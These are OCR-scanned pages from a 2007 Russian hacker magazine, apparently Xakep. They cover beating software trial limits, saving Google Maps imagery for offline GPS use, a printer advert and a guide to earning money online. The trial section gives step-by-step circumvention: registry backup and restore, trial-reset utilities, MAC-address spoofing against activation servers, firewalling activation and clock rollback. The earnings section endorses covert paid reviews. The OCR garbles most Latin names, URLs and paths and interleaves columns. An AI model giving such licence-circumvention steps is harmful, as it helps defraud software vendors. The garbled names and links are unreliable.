АРІ функции, которые доступны только пабѵе-АРІ функциям, 
то есть низкоуровневым функциям операционной системы. 



А редактор реестра использует высокоуровневые функции, 
принадлежащие подсистеме ѵѵіп32. Все это затрудняет борьбу 
с защитами. 

Реестр можно условно разделить на две части: пользователь- 
скую (уникальную для каждого пользователя) и системную 
(одинаковую для всех пользователей). Подавляющее боль- 
шинство ветвей системного реестра доступно только с пра- 
вами администратора, поэтому если защищенная программа 
была установлена из-под пользовательского аккаунта, то с 
вероятностью, близкой кединице, флаг присутствия располо- 
жен именно в пользовательском реестре. 

Хорошо, пусть в пользовательском. А как его найти? Вот 
тут кто-то советует воспользоваться монитором реестра 
Марка Руссиновича, чтобы посмотреть, к каким ветвям 
реестра обращается программа при установке. Очевидно, 
что одной из этих ветвей будет флаг присутствия. Однако, 
помимо флага присутствия, программа читает и другие 
ветви реестра. Очень много ветвей! Настолько много, что 
на поиск нужной можетуйти несколько дней. Ктому же 
удалять ветви, к которым произошло обращение, очень 
опасно, особенно если их назначение неизвестно. Одно 



Определение даты создания файла через проводник 
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Зло породило зло... 

...оно же его и похоронит 
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апуск программы от имени другого пользователя 



неверное движение мышью — и хана системе. В от та к радость! 

На самом деле искать флаг присутствия совершенно необязательно! «Пуск 
Настройка -> Панельуправления -> Пользователи и пароли». Создаем 
нового пользователя, заставляя систему генерировать девственно чистый 
экземпляр пользовательского реестра, и устанавливаем программу, войдя 
в систему под его именем. Если программа установилась и успешно работа- 
ет, значитона действительно хранит флаг присутствия в пользовательском 
реестре. 

Теперь заходим в систему под нашим основным именем, создаем ярлык 
исполняемого файла защищенной программы, щелкаем по нему правой 
клавишей мыши и в «Свойствах» ставим галочку напротив пункта «За- 
пускать от имени другого пользователя». Все! Теперь при каждом запус- 
ке программы будет высвечиваться диалоговое окно для ввода имени 
и пароля, что немного раздражает, но все же лучше, чем совсем ничего. 
Однако не все программы могут быть запущены подобным образом, и для 
некоторых из них необходимо использовать штатную утилиту командной 
строки гипаз.ехе с ключами /ргобіе и /епѵ, назначение которых можно 
узнать из справки. 

Переходим к более сложной части — системному реестру. Самое лучшее, 
что можно сделать, — это до установки защищенной программы вызвать 
штатную ути л иту М іеговой Васкир (Пуск-> Выполнить «піЬаскир.ехе»), 
во вкладке «Архивация» взвести галочку «Состояние системы», сохранив 
реестр на диск. После окончания срока действия триала достаточно выпол- 
нить операцию восстановления, возвращая реестр в исходное состояние. 
При этом, естественно, теряются все системные настройки, выполненные 
после архивации, и перестают работать программы, установленные после 
этого момента, требуя переустановки, что является главным недостатком 
описанной методики. 

С другой стороны, свыше 90%триальных программ хранит флаги присутс- 
твия именно в системном реестре, а потому М іеговой Васкир становится 
весьма эффективным средством взлома. В принципе ничего не мешает нам 
установить все постоянные программы (нетребующие регистрации), после 
чего зарезервировать реестр, тогда время обустройства системы после 
отката существенно сократится. 

Существуютспециализированные утилиты типа ТгаіІНезеТ ищущие 
флаги присутствия, которые создаются популярными протекторами типа 
АгтасШо, АЗРгоІесІ, ЕхеСгурІог, еіе, и удаляющие их из реестра, нетрогая 
настройки остальных программ, что позволяет получить вечный триал без 
лишнего геморроя. Однако достаточно часто ТгаіІПезеІ: не срабатывает, вы- 
нуждая хакера прибегать крупному сохранению/восстановлению реестра. 
Взломщиктакже может задействовать утилиты, предназначенные для де- 
инсталляции программ, которые неумеютудалятьсебя сами. Такихутилит 
очень много, но принцип их работы один: перед установкой программы 
создается слепок реестра, а после выполняется поиск вновь создан- 
ных ветвей. Утилиты автоматической деинсталляции ломают большое 
количествотриальных защит, но... далеко не все. В частности, в системном 



реестре содержится так называемое «защищенное хранилище», в которое 
лезет большинствотриальных программ, но которое не проверяетни одна 
известная мне утилита автоматической деинсталляции. 

г СЛОЖНЫЕ ЗАЩИТЫ 

Развитие интернета привело кпоявлению мерзкого класса триалов, тре- 
бующего активации через Сеть. Если на активацию отпущено хотя бы семь 
дней, получается тотже самый триал, нотолько с крылышками, ломае- 
мый посредством сохранения/восстановления реестра (или же поиском 
флагов на диске). Хуже, если активация требуется при первом же запуске 
программы! Такие защиты обычно работают по следующему принципу: 
программа определяет конфигурацию компьютера, отправляя данные на 
сервер активации. Если на сервере активации такая конфигурация еще не 
обозначена, сервер отправляет кодовый ответ «Включить триал», после 
чего программа работает определенное количество дней. Повторные ак- 
тивации, как легко сообразить, не дают желаемого результата, поскольку 
сервер видит, что этот пользователь уже активировал программу, а его 
срок действия триала истек. 

Ситуация кажется безнадежной, но нас здорово выручает тот фа кт, что в 
информацию о конфигурации обычно входит и МАС-адрес сетевой карты 
(если она есть). Теоретически он должен быть уникален и на планете 
Земля не может существовать двух сетевых карте одинаковыми МАС-ад- 
ресами. Но это, повторяюсь, теоретически. Практически же МАС-адрес 
легко изменить с помощью специальных утилит. А еще проще и безо- 
паснее — установить драйвер виртуальной сетевой карты, МАС-адрес 
которой зачастую может быть изменен через графический интерфейс 
управления драйвером! 

Также некоторые (между прочим, достаточно многие) защиты отклады- 
вают активацию до первого выхода в интернет, справедливо полагая, 
что постоянный доступ в Сеть есть не у всех и включать его в список 
обязательныхтребований по меньшей мере негуманно. Следовательно, 
спасти взломщика от посягательств защиты может любой нормальный 
персональный брандмауэр — достаточно запретить программе ломиться 
в интернет! Впрочем, пародия на брандмауэр под названием ѴѴіпсІоѵѵз 
Рігеѵѵаіі, встроенная в ХР, помогает далеко не всегда. Дело в том, что она 
не запрещает программам вызывать системные функции, определяю- 
щие, подключен ли компьютер к интернету или нет. А потому, если ком- 
пьютер подключен к интернету, но установить соединение с сервером 
активации неудается, защита вправе потребовать, чтобы пользователь 
открыл ей доступ на брандмауэре. 

Другой тонкий момент. Некоторые защиты содержат в своем теле жестко 
прошитую дату «забастовки», например, на шесть месяцев отстоящую от 
текущей даты. Тогда, даже хакер удали флаг присутствия, переустановить 
программу по окончании этого срока уже не удастся. Ему придется качать 
свежую версию или же перевести системные часы назад (воспользоваться 
утилитой Тгіаі Ргеегег). ц-ц 
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КАРТОГРАФИЧЕСКИЕ 



ЗАМОРОЧКИ 



МАЛЕНЬКИЕ СЕКРЕТЫ БОЛЬШОГО СЕРВИСА 600СІ.Е МАР5 



> № 



НЮ нм 



НЮ МИГ 



Если бы несколько лет назад мне кто-нибудь сказал, что я смогу рассмотреть спутни- 
ковую антенну на крыше своего дома прямо из инета, я бы рассмеялся и, скорее всего, 
даже поспорил на кругленькую сумму, что этого не может быть. Однако время идет, и к 
сервисам, подобным Соо§1е Еагій, все привыкли и вообще воспринимают их как долж- 



ашпса 

- 



ное. Только вот использование их зачастую ограничивается игрой «Найди свой дом на 



карте». И только! Да разве ж можно оставлять такое сокровище без дела? 



е знаю, кактебя, а меня лично всегда напрягалото, что боодіе 
Марз — это чисто онлайновый сервис. Да, программа Ооодіе ЕагіЬ 
умеет кэшировать просматриваемые участки карт, только толку 
от этого мало. Не будешьже вручную просматривать весь город 
квадратза квадратом, чтобы программа таки сохранила оффлайн-копию карты. 
Конечно, нет! Ктомужеу программы есть другие серьезные недостатки: 

• кэш имеетограничение по объемухранящихся данных (2 Гб); 

• даже при таком скромном объеме кэша заполнить его невозможно; иногда 
ѲЕ просто «забывает» о том, какие данные уже есть в кэше, и начинает 
качать их заново; 



• нет возможности скачать выбранные данные для заданной территории, 
чтобы потом их можно было использовать без подключения к интернету; 

• нет возможности задействовать данные одновременно из нескольких 
кэш-файлов (например, на двух соседних машинах) для экономии трафика; 

• отсутствует возможность применять географические данные вне про- 
граммы-клиента Эоодіе ЕагіЬ (например, распечатать большую карту или 
использовать в 6Р5-приложениях). 

Этот список можно было бы продолжить, но вместо поиска недостатков я 
решил заняться изучением внутренностей сервиса боодіе Марз. Через не- 
которое время пришло понимание общих принципов работы и стало ясно, 
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Редакция ][ на спутниковых картах 

что написать программу, которая могла бы сама в автомати- 
ческом режиме скачать квадрат карты с заданными коорди- 
натами, нетаксложно. Но, прежде чем браться за кодинг, я 



ОоодІеѴ: закачиваем карту! 

огромный квадрат вокруг нашего офиса с максимальной 
детализацией. Спасибо провайдеру: 1 -2 Мб в секундульет 
практически стабильно. 




«Первая версия программы Соодіе ЕагіП разработана вовсе не боодіе, 
а компанией КеуНоІе, Іпс. Гугл приобрел ее в 2004 году» 



I решил сначала поискать готовые варианты. И не прогадал. Их 
I оказалосьаж целыхтри! 

^ АВТОМАТИЧЕСКАЯ ЗАКАЧКА КАРТ 

I Первой программой, которую по иронии судьбы отыскал 
сам же Соодіе, оказалась ЕагіЬ Біісег [ ЬіІрУ/Іогит.ЬеІгпар. 

I іпіоА/іе\л/Іоріс.рЬр?1=14 ). То, что когда-то начиналось с задумки 
I просто автоматической закачки карт Соодіе, стало чуть ли не 
полноценной навигационной системой. Не без ограничений, 

I конечно, но вто же время вполне работоспособной. Чтоона 
I умеет? Ну конечно же закачивать карты. Причем быстро, в 
I несколько потоков и, что важно, с разных зеркал (иху Соодіе, 

И естественно, несколько). При этом процесс закачки символич- 
I но обозначен на экране: блоки, которые уже готовы и которые 
Ч только предстоитзакачать, выделены. 

ТееИгнэ В общем, не прошло и нескольких минут, какя выкачал 



В принципе, можно было остановиться и на этом, довольству- 
ясь результатом. Но воттак заканчивать эксперимент не хоте- 
лось. Если есть карта и эта карта максимально приближена к 
действительности, то почему бы не использовать ее в связке с 
6Р5? Мы уже проделывали нечто подобное в статье «5 шагов 
навстречу 6Р5», но использовали при этом онлайн-сервис. А 
какбы привязать карту к координатам и использовать на но- 
утбуке или КПК без подключенного интернета? Очень просто, 
если вспомнить о существовании навигационной системы Огі 
Ехріогег І ѵѵѵѵѵѵ.огіехрІогегЗ.согп ). ЕагіЬ Біісег, как и другие 
утилиты (о них речь пойдетпозже), изначально предполага- 
ют, что созданные карты далее могут быть использованы в 
связке с этой самой программой. Все, что ей требуется, — это 
специальный файл привязки, в котором описано несколько 
опорных точек с указанием точных координат, а также другие 
необходимые параметры. Короче говоря, на выходе ЕагіЬ 



> Ііпкз 

ѵѵѵѵѵѵ.іоаіі.ги — сайт, 
где можно обменять- 
ся скачанным кэшем 
сдругими пользова- 
телям. 

еагіЬ.доодІе.сот/ 
іпіі/ги — официаль- 
ный сайт программы 
боодіе ЕагіЬ. 

ЫірѴ/тосІезІтарз. 
сот — забавный 
онлайн-сервис для 
работы с картами. 




> СІѴСІ 



Как узнать, когда были сделаны 
последние снимки и с каким “ ш ' и ™ 

разрешением? 



Есть 2 способа: 

1 . В Соо§1е ЕеагіЬ есть так называемые слои Оі^ііаі СІоЪе Соѵега§е («Слои» -> «Основная база данных» -> «Еще») . Если их 
включить, на карте появится множество квадратиков с указанием даты, когда был сделан снимок. Велика вероятность, что 
такие слои покрывают нужную зону. 

2. Если снимки имеют разрешение не выше 10 м на пиксель, то? скорее всего, они являются Іапсізаі’ими. Вот и хорошо! От- 
крываем сайт \ѵѵ\дѵ.1ап(І5аі.ог^/ог11іо/іп(іех.Ьіт и карту покрытия этих снимков (клик по РаіЬ-Коѵѵ Ріпсіег) . Если сумеешь 
найти правильные параметры РаіЬ и Ко\ѵ, то сможешь посмотреть снимки на их РТР (ссылки на ѵуѵуѵу.іапбзаі.ог^/огіііо/ 
іпбех.іііт) . В имени файла для РаіЬ и Коѵѵ будет указана дата получения снимка. 
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Надо измерить секстаном угол 
возвышения солнца в полдень 
- и можно вычислить широту. 
Но куда же нам идти?.. 



Чувак, как же круто, что я 
купил себе коммуникатор с 
СР5 . Нам налево : ) . 



Зіісег получится два файла: саму карту (например, тозсоѵѵ.Ьтр) и файл 
привязки для 0і\ (тозсоѵѵ.тар). Далее можно сразу приступить к конвер- 
тированию карты в формат Оіі Ехріогег, но опытные люди настоятельно 
рекомендуют немного поколдовать над готовым изображением. Дело в 
том, что большинство карты Зоодіе’а довольно бледные, серые и вообще 
смотрятся довольно неказисто. Причем ситуацию легко можно испра- 
вить, если сделать коррекцию цветов. Во многих программах (например, 
АСБЗее) есть возможность сделать та кую операцию автоматически. В 
частности в АСйБее ( ѵѵѵѵѵѵ.ассізее.сот ) это делается в режиме редактиро- 
вания изображения, посредством нажатия на кнопку Ехрозиге. Все:теперь 
черный станетчерным, белый— белым, а сама карта — более насыщеной 
и читаемой. Тоже самое можно было бы сделать и с помощью бесплатной 
«смотрелки» ХІЧѴіеѵѵ ( ѵѵѵѵѵѵ.хпѵіеѵѵ.сот і. Теперь, можно преобразовать 
карту в формат Огі Ехріогег , воспользовавшисьутилитой \тд2огі ( ѵѵѵѵѵѵ. 
02ІехрІогег3.сот/ітд2о2І/ітд2о2І : .ЫтІ ]. После конвертации получаем на 
выходе два файла: имя_карты.тар и имя_карты.огІ : 2. Копируем их в папку 
Мар в директории установки Огі на КПК (или компьютера) и указываем к 
ним путь в настройках Огі. Готово! 

г НАШИ РАЗРАБОТКИ 

ѲоодІеМарѴіеѵѵег (она же ОоодІеМѴ, \лллл/ѵ.зіІЬег2004.пагосІ.ги ) — это еще 
одна подобная утилита от отечественного разработчика, которая прекрас- 
ноумеетсклеивать изображения любого размера и сохранять их вірд-фор- 
мате. Опятьже большой плюс заключается в функции привязки реальных 
координат вкупе с работой с О 2 І Ехріогег. Работать с программой очень 
удобно, поскольку закачка, подобно Ооодіе ЕагіЬ, осуществляется с фо- 
новом режиме и в этот момент можно искать другие области для закачки, 
изменяя зону просмотра. Чтобы получить готовую карту, не надо вводить 
какие-либо координаты и вообще как-либо морочиться, достаточно просто 
выделить нужную область на карте. 

Однако после непродолжительной работы с ОоодІеМѴ выяснилась одна ее 
неприятная особенность. Несмотря на то что кэш программы неограничен, 
она не учитывает важную деталь, а именното, чтоуфайловой системы 
есть ограничения по количеству файлов. Офисный компьютер, где часть 
дисков до сих пор находится на РАТ, начал сходить с ума. Быстро найден- 
ная альтернатива в лице ОоодІеѴ с этой проблемой успешно справилась. 
Кроме того, тулза удивила поддержкой ключевыхточек (ѵѵауроіпіз) и треков 
(ігаскз) самых разных форматов. ОоодІеѴ также лихо прокладывает марш- 
руты и вообще оставляет только самые позитивные впечатлений. Хитрая 
система для хранения карт предполагает, что изображения содержатся 
в больших файлах. Такие файлы могут содержать множество единичных 
изображений, и ими удобно пользоваться для того, чтобы обмениваться 
выкачанными наборами или переносить с одного компьютера на другой. 

^ МАЛЕНЬКИЕ ХИТРОСТИ 

Некоторое время я все же елозил в Ооодіе ЕагіЬ, вручную кэшируя нужные 
участки карты. Закачивать их заново не хотелось, поэтому возник вполне 
резонный вопрос: а как бы этот кэш оттуда вытащить и превратить в 
один ірд-файл? Для этого нам понадобится следующее приложение: 




Извлекаем кэш Ооодіе ЕагІЬ 



ЫірУ/дооаІе-еагіЬ.пагосІ.ги/сіоѵѵпІоасі/ОЕ ЗРО ех1гас1ог.7г . Далее нужно 
открыть файл, который расположен здесь: 

С: ХБосшпепГз апй ЗеРбіпд5\ИМЯ_ТЕКУЩЕГО_ПОЛЬЗОВАТЕЛЯ\ 

Ьосаі Зеббіпдз\Арр1іса1:іоп ВаЬа\Соод1е\Ооод1еЕагЫі\ 

(ЛэСасЪе . сіаР 

Поскольку файловая система не предназначена для хранения в одной пап- 
ке сотен тысяч файлов, они складываются во вложенные папки так, чтобы 
в каждой папке было не более 1 -2тысяч файлов. Поскольку программа не 
умеет определять, какие данные новые, а какие старые, файлы с одинако- 
выми именами будут пересекаться, и в итоге в кэше останется картинка, 
которая попала в него последней). Теперь можно написать небольшой 
скриптик, которые объединит все снимки в один файл. Примечательно, 
что можно извлечь файлы для использования в программе ѲоодІеМѴ. В 
этом случае достаточно лишь поставить флажок «ОоодІеМѴ (имена файлов 
’дгзЕ)». В последний момент перед сдачей обнаружилась еще одна замеча- 
тельная утилита — МарВиіІсіег^ог Ооодіе Марз ( тарЬиіШег.Ьѵ.ги ). Закачать 
карты из Ооодіе Марэ — легко! Вытащить кусок из кэша ОЕ — тоже. Да что 
там говорить, если ей под силу скачать даже карты с сервиса отЯндекс 
( тарз.уапсіех.ги) . А как посмотреть карты, которые сохранилисьутебя в 
кэше после просмотра через Ооодіе Марз? Да так, чтобы обязательно без 
подключения к Инету? Все это позволяет выполнить небольшая программа 
5А5. Планета ( бІІрѴ/зазоіз.ги/ЗАЗ.РІапеІ-О.б.гаН .ІИІ 



«Пасхальное яйцо» 

Как и во многих других солидных продуктах, в Ооодіе Еаггіі есть 
пасхальное яйцо. Причем очень прикольное — настоящий авиасиму- 
лятор. Для запуска игры необходимо одновременно нажать клавиши 
<Сгг1>, <Ак> и < А >. Перед тобой появится специальное окошко, 
в котором можно выбрать самолет (пока пользователям доступны 
всего две модели самолетов: РІбѴірег ИЛИ 5К22) . Затем стоит 
ознакомиться со списком клавиш управления. После этого разреша- 
ется взлетать. Игра не была анонсирована, и о ее существовании не 
говорится в документации. 

В одной из последних версий в Соо§1е ЕаггЬ появилась возможность 
просматривать карту звездного неба. Для перехода к небу нужно 
выбрать в меню команду 8і/ѵі(сЬ *о 8ку (в русской версии «Перейти 
к просмотру неба»), после чего на экране появится карта звездного 
неба над регионом, который был выбран в Соо§1е ЕаггЬ. С такой 
картой можно выполнять все те же операции, что и с фотографиями 
Земли: приближать и удалять, плавно прокручивать, включать и 
выключать информационные слои. В общей сложности с помощью 
в Ооодіе ЕаіТІі доступно более ста миллионов звезд и 200 миллионов 
галактик. Особенно прикольно, что для просмотра также доступны 
фотки, сделанные телескопом «Хаббл», и анимация лунных фаз. 



► 044 



ХАКЕР 12 /108/ 07 






Устройство «Все-в-Одном» 

НР РЬокэзтагІ' С5283 

Рекомендованная розничная цена - 4 390 руб. 

• Простота эксплуатации 

• Эффективная система печати, специально 
созданная для экономии чернил 

• Профессиональное качество фотографий 
и четкий текст 

Выбери оригинальный картридж НР, 
соответствующий твоим потребностям 
в печати и бюджету. 

Экономь на стоимости картриджа - выбирай стандартные 
картриджи НР в синей упаковке для средних объемов печати. 

Экономь на стоимости печати - выбирай экономичные 
картриджи НР в зеленой упаковке для больших объемов печати. 



У№Т№ШеТ&5 а Ѵ?“ 

**К чему стремишься ты? 



ДО ДВУХ РАЗ 

БОЛЬШЕ 

ФОТОГРАФИЙ 
И ДОКУМЕНТОВ 
ЗА ТЕ ЖЕ 
ДЕНЬГИ* 



Тел 8 - 800 - 200 - 3-500 
Сайт: ѵѵѵѵѵѵ.іір.гіі/ісіеа 




*По сравнению с другими моделями этой ценовой категории. При одинаковом количестве чернил. Зависит от модели принтера и режима использования. По результатам внутренних 
тестов НР. Тестировались модели: НР РЬок>$тагІ С5280, Сапоп Ріхта МР510, Ерэоп 5іу|ц$ ИХ 6000, Косіак Еа$у$Ьаге 5100, ВгоіНег МРС-440сп. 

©2007 НеѵѵІеМ-РаскагсІ РеѵеІортепІ Сотрапу, І..Р. Все права защищены. На правах рекламы. 



ВАСИЛИЙ ЛЕНСКИЙ 

/ Ѵ.І.ЕЫ5КѴ@СМАІІ..СОМ / 



5 реальных способов 
заработать в Сети 



Бум всеобщего интереса к заработку в интернете прошел. Многие успели попробовать 
себя в пирамидах, реферальных системах, кто-то кликал по рекламным ссылкам за 
деньги. В конце концов становилось ясно, что если так и можно заработать, то только 
гроши. Сейчас времена немного изменились, и наряду со старыми методами, которые 
стали вполне реальными, появились новые формы заработка. Причем вполне осязаемого. 
Вот пять реальных примеров! 



1 - вкладывать немало сил и напрягать мозги. А чтобы получать действи- 
мать подчас очень сложные решения и нередко выполнять однообраз- тельно большие деньги, придется приложить недюжинную смекалку и 
ные действия. Короче говоря, тебе придется работать! Глупо надеяться, серьезное усердие. Ничего сверхъестественного — все, как в обычной 





очу, чтобы ты сразу уяснил себе одну очень простую истину. до 1 000 баксов в месяц. Это почти нереально. Также как попасть сразу 
Никто никогда ничего тебе бесплатно не даст. Где бы ты ни на хорошую должность в крупной компании без опыта работы. Тут, как 

работал — в душном офисе или дома на диване — тебе все и везде, сказок не бывает, и чтобы получать деньги в Сети необходимо 



что, прочитав статью, ты тутже сможешь поднять заработок, скажем, жизни. Итак, первый способ. 



ГІИ Фрилансерство 




Как много в этом слове. Возможно, 
не все с ним знакомы, поэтому я 
объясню. Фрилансер — это человек, 
работающий без заключения 
долговременного договора с 
работодателем и выполняющий 
строго определенный перечень 
работ. Проще говоря, внештатный 
работник, нанимаемый обычно для 
разовой задачи. Рынокспроса и 
предложения работы для фрилан- 
серов просто огромен. За примером 
далеко ходить не надо: взять хотя 
бы сотрудничество с крупными 
печатными изданиями, например 
с «Ха кером». Автором ][ может 
стать совершенно любой человек, 
независимо от возраста, пола, 
национальности, образования и 
чего-либо еще. Если человек напи- 
шет качественный и актуальный ма- 
териал, то его опубликуют, а автору 
начисляти переведутудобным для 
него способом гонорар. 



хорошо, это надо использовать. Первоначальные вложения: никаких 

Неважно, умеешь ли ты настраивать Ірж получить дёньгй: е - д р Ійіі ІрауЩІ. , , г чек 

серверы, понимаешь что-то в ди- Вероятность быстрого старта: велика 

зайне или можешь написать тысячи 



строк кода за один день, — при 
желании ты и дня не проведешь 
без дела. Даже если ты новичок, 
все равно можно попробовать, но в 
этом случае надо выбирать самые 
простые (и, соответственно, самые 
низкооплачиваемые) задания. 
Во-первых, сможешь заработать, а 
во-вторых, незаметно для себя под- 
натаскаешься, поднакопишь опыта 
и будешь браться уже за более се- 
рьезные проекты. А в перспективе и 
сам станешь нанимать работников, 
чтобы те выполняли самую кропот- 
ливую часть работы. 
Возникаетлогичный вопрос: где 
взять эти самые задания? Спе- 
циально для этих целей созданы 
сайты, где фрилансеры выкла- 
дывают резюме, а работодатели 



публикуют задан ия и проводят положительных оценок — непло- 

что-то типа тендера. В рунете на- хое подспорье для продуктивной 
ибольшую популярность получили работы. Но его нужно заслужить. Эту 
такие ресурсы, как \ллллл/Чгее-[апсе. тему мы в дальнейшем рассмотрим 
ги и ѵѵѵѵѵѵігееіапсе.ги . Но я все-таки более подробно, 
настоятельно рекомендую тебе со- Чтобы внести полную ясность, при- 

трудничать с западными ресурсами веду несколько примеров заданий, 

типа ѵѵѵѵѵѵ.аеіаітееіапсег.сот . Там которые я взял прямо с первой 

ты найдешь просто огромное ко- страницы сайта: 

личество разнообразных заданий. • Настроить почтовый сервер на 
Желающих их выполнить (особенно базе Ресіога 6 с использованием 
индусов) велико, поэтому будущий РозШх, Соигіег, Му50І_, Розійх, 
исполнитель задания определяется Ресіога 6 ($100). 
в ходе аукциона. Кто предложит • Создать простой сайте одной 

лучшие условия и больше понравит- флеш-вставкой ($300). 
ся работодателю, тот и в теме. Надо • Стенография четырехчасового 
сказать, что и работодателю, и каж- интервью ($100) 
дому фрилансеру после выполнения • Переписать 2000 строк кода с Регі 
задания можно оставить отзыв. на Оаѵа ($2000) 

Хорошее портфолио с десятком • Улучшение аудиокодека ($4500). 



положительных оценок — непло- 
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Что надо: знание 5Е0, умение создавать сайты 
Первоначальные вложения: домен, хостинг, поддержка сайта 

Вероятность быстро начать получать деньги: большая, если речь идет о 



[»КИ Контекстная 
реклама 

Для большинства реклама — это 
двигательторговли. А для кого-то 
— способ заработать на жизнь и 
квартиру в Москве. Контекстная 
реклама на сайте является одним 
из наиболее доступных, надеж- 
ных и в то же время эффективных 
способов заработать в Сети. 
Принцип простой: утебя есть сайт, 
ты размещаешь на нем некото- 
рый код, который при посещении 
твоей страницы превращается в 
релевантную рекламу. Релевант- 
ную — это значит контекстно-свя- 
занную с содержанием страницы. 
То есть если человек просмат- 
ривает обзор свежего фильма, 
то контекстной рекламой может 
стать предложение о покупке 0\Ю 
с этой картиной. Если он перей- 
дет по ссылке, владельцу сайта 
перечислится вознаграждение. В 
итоге довольны все: сама система, 
которая получает процентза свои 
услуги, владелец сайта и даже его 
посетитель, который перешел по 
заинтересовавшей его ссылке 
и сделал себе приятное, купив 
фильм. 

Теоретически это наиболее эффек- 



тивный и в то же время наименее 
раздражающий вид рекламы. 
Самая серьезная проблема здесь 
— это поиск площадки. Те, кто 
занимается контекстной рекла- 
мой профессионально, создают 
проекты с нуля, раскручивают их, 
всеми силами гонят на них трафик 
(посетителей). При определенном 
желании это под силу каждому. Но 
нужно не прогадать стематикой 
сайта: с одной стороны, она должна 
бытьдовольно специфична (ниша, 
которая наименее занята), а с дру- 
гой — достаточно привлекательна 
для посетителей и рекламода- 
телей. От выбранной тематики и 
количества предложений на рынке 
зависит цена, которую будет готов 
платить рекламодатель за каждый 
клик. Обычно она колеблется от 
$0,01 до $5. Учитывается также 
целевая аудитория читателей: 
рекламодатели по теме «Бизнес» 
платят за клик в разы больше, чем 
рекламодатели по теме «Прико- 
лы», что и понятно. 

Хорошо, общий принцип понятен. 
Что делать дальше? Где взять эту 
контекстную рекламу? Нас в пер- 
вую очередь будут интересовать 
три сервиса: 



Яндекс. Директ ( ЫірѴ/рагІпегз. 
ѵапсіех.ги ) — большее количество 
рекламодателей, самая раз- 
ная тематика. Однако к сайтам 
предъявляются достаточно строгие 
требования. 

Ведип ( ѵѵѵѵѵѵ.Ьедип.ги ) — рекламо- 
дателей здесь меньше, но зато пра- 
вила менее строгие, а стоимость за 
клик обычно выше, 
боодіе АсІБепзе ( ѵѵѵѵѵѵ.аооаіе.сот/ 
абзепзе ) — это боодіе, самый про- 
двинутый сервис, сама большая 
база рекламодателей, и почти все 
они рассчитывают на размещение 
рекламы на иностранных ресурсах. 
То есть на русскоязычных сайтах 
далеко не уедешь. Но есть и другая 
трудность. В качестве выплаты 
используются чеки, которые долго 
идут по обычной почте, а потом 
довольно сложно обналичиваются. 
Впрочем, это не мешает многим 
создавать сайты для иностранной 
аудитории и поднимать на этом 



если нетысячи, то несколько сотен 
долларов ежемесячно. 

ВІодАсіз ( уууууу.Ыоаабз.сот ) — это 
спонсор, работающий исключи- 
тельно с блоггерами и платящий 
им от$50 до $5000 в месяцза про- 
дажу рекламы. Но вступить в число 
пользователей не так просто. 

Как увеличить отдачу от контекс- 
тной рекламы? Эта целая наука, о 
которой каждый день пишут 5 ЕО- 
специалисты и блоггеры (ссылки 
ищи во врезке). Можно одну неде- 
лю попробовать посотрудничать с 
одним спонсором, другую — с дру- 
гим, третью — стретьим, оценить 
эффективность и остановиться на 
одном из них. В принципе никто 
не запрещает использовать все 
три одновременно, но если обычно 
контекстная реклама восприни- 
мается как должное, то в данном 
случае она уже может вызвать 
отвращение. Едва ли это прибавит 
эффективности. 




[»КЯ Партнерские 
программы 

У опытных сайтоводовов это зачас- 
тую основной способ заработка. 
Сама идея стара, как мир: приво- 
дишь клиента и получаешь за это 
бонус. Вознаграждение обычно рас- 



считывается как процент от покупок 
пользователя, которого ты привел. 
Самые выгодные спонсоры: круп- 
ные онлайн-магазины с именем, 
онлайн-казино, службы знакомств, 
«аптечные пункты», которые пачка- 
ми продают вал иум, виагру и прочие 



штуковины, способные вернуть 
мужикам уверенность в себе. 
Партнерки были всегда и везде; где 
об этом только не писали; возможно, 
даже ты успел попробовать себя в 
роли посредника. Ничего не получи- 
лось? Значит, ты что-то делал не так. 
Во врезке я привел ссылки на блоги 
так называемых «бомжей» — людей, 
которые задались целью заработать 
на квартиру только при помощи 5Е0, 
рекламы, партнерских программ и 
прочих видов заработка в интерне- 



те. В подкрепление своих слов они 
ежемесячно приводят конкретные 
цифры, скриншоты из админок 
партнерских программ (суказанием 
суммы), атакже сканы чеков. На 
какую сумму они рассчитывают? 
Зачастую это суммы в районе $5000 
в месяц, однако надо понимать, что 
ребята посвящают этому все свое 
время, а некоторые и вовсе отказы- 
вают себе при этом во всем (и идут 
ксвоей цели)! Кчемуэтоя?Актому, 
что если посмотреть на структуру 



Что надо: знание 5Е0, умение создавать сайты 
Первоначальные вложения: домен, хостинг, поддержка сайта 

Вероятность быстро начать получать деньги:большая, если речь идето 
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их доходов, то видно, что основная 
часть приходится именно на парт- 
нерки. Но со знанием дела. 

Глупо продавать доступ к онлайн- 
казино на сайте, посвященном ком- 
пьютерной тематике. Куда лучше 
сделать отдельный проект, причем 
ориентированный на англоязыч- 
ную аудиторию, посвященный, ска- 
жем, истории покера, и применять 
партнерскую программу там. Вот 
примеры неплохих партнерок: 
Атаіоп Аззосіаіез ( ЬНрѴ/айіІіаЕе- 
ргодгат.атагоп.сот ) — помогай 



продавать продукцию известней- 
шего инет-магазина и получай до 
10% от стоимости проданного с 
твоей помощью товара. 

СІіскВапк [ ѵѵѵѵѵѵ.сІіскЬапк.сот ) 
продает 10 ОООтоваров и платит 
комиссию в 75% за твою помощь! 
Вообще говоря, партнерки есть для 
сайта практически любой тематики, 
вот неплохие каталоги : ѵѵѵѵѵѵ.ѵѵоѵѵеЬ. 
ги/Ьоагб . ѵѵѵѵѵѵ.аіШіаіе.ги . аМіаіе. 
аіті.ги/Ыоа . Некоторые партнерс- 
кие программы предоставляют не 
сервисы в готовом виде на установ- 



ку, а лишь рекламные материалы 
(баннер, статьи, ссылки), ведущие 
на их сайт. Хорошие варианты 

— партнерка службы знакомств 
(лучшая из партнерокзнакомств 

— бир://рагіпег.[оѵер[апеГги/ 
раііпег.біті ). продажа зЬагеѵѵаге- 
игр [ Ьир://таиІпеі.ги/агсЫѵез/54 І 
и пр. Соответственно, ты будешь 
получать процент от продаж игр, 
которые купили юзеры через твой 
сайт, или процент от затрат в службе 
знакомств юзеров, которые пришли 
опять же через твой сайт. 




Что надо: иметь блог, отлично знать английский 

Первоначальные вложения: поддержка своего блога 
Ка к получить ден ьги : чек 

Вероятность быстро начать получать деньги: средняя 



[»ЕР Скрытый 
маркетинг 

Если реклама в открытом виде не 
работает, можно попробовать ее 
завуалировать. Например, под 
хвалебный пост какого-нибудь 
популярного блоггера или сайта. 

У нас в рунете такие сделки носят 
единичный характер (и обговари- 
ваются индивидуально), однако на 
Западе это вполне обычная прак- 
тика. Есть люди, готовые писать 
рецензии и отзывы на заказ. Есть 
рекламодатели, которые готовы за 



это платить. Есть сервисы, дающие 
возможность реализовать свои 
планы и тем и другим. Приведу 
список наиболее известных: 
